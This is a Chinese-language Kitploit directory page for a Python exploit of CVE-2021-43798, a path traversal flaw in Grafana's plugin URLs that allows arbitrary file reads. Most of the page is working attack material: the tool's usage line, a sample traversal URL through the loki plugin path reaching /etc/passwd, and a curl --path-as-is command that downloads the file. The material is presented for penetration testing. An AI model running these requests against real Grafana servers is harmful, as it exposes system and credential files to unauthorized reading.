Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-43798 — Python 针对 CVE-2021-43798 的漏洞利用程序,该漏洞是 Grafana 中的路径遍历漏洞,可通过插件 URL 中的目录遍历实现任意文件读取。 | Kitploit
工具/GitHubGitHub/g01d3nw01f/cve-2021-43798
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubg01d3nw01f/cve-2021-43798

CVE-2021-43798

Python 针对 CVE-2021-43798 的漏洞利用程序,该漏洞是 Grafana 中的路径遍历漏洞,可通过插件 URL 中的目录遍历实现任意文件读取。

查看仓库
3年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

usage: grafana-exploit.py [-h] -H/--host HOST grafana-exploit.py: error: the following arguments are required: -H/--host

示例:python3 grafana-exploit.py --host <target_host>

如果成功读取任意文件,将显示请求 URL 和 curl 命令

root@kitploit:~
[+]RequestURL
http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd
 
[+]curl_command
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd"

因此,如果你想下载文件,请按上述方式执行

root@kitploit:~
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd" -o passwd
下载工具